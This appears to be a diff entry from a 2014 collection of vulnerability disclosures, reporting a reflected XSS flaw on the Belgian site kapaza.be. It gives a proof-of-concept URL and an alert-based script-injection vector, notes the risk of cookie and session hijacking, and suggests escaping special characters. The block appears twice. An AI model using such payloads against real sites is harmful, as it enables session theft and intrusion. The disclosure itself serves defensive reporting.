MiguelBel · December 3, 2014 18:51
diff --git a/Kapaza.be b/Kapaza.be
 Bypass Google Chrome Auditor: No
 
 Web: http://www.kapaza.be
 
 Vulnerability: Reflected XSS
 
 PoC (Proof of concept): http://www.kapaza.be/nl/li?w=3&q=%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+
 
 Attack Vector: </title><script type="text/javascript">alert('xss');</script> 
 
 Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention. 
 
 Solution: Escape the special chars '';!--"<XSS>=&{()}
	Bypass Google Chrome Auditor: No

	Web: http://www.kapaza.be

	Vulnerability: Reflected XSS

	PoC (Proof of concept): http://www.kapaza.be/nl/li?w=3&q=%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+

	Attack Vector: </title><script type="text/javascript">alert('xss');</script>

	Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention.

	Solution: Escape the special chars '';!--"<XSS>=&{()}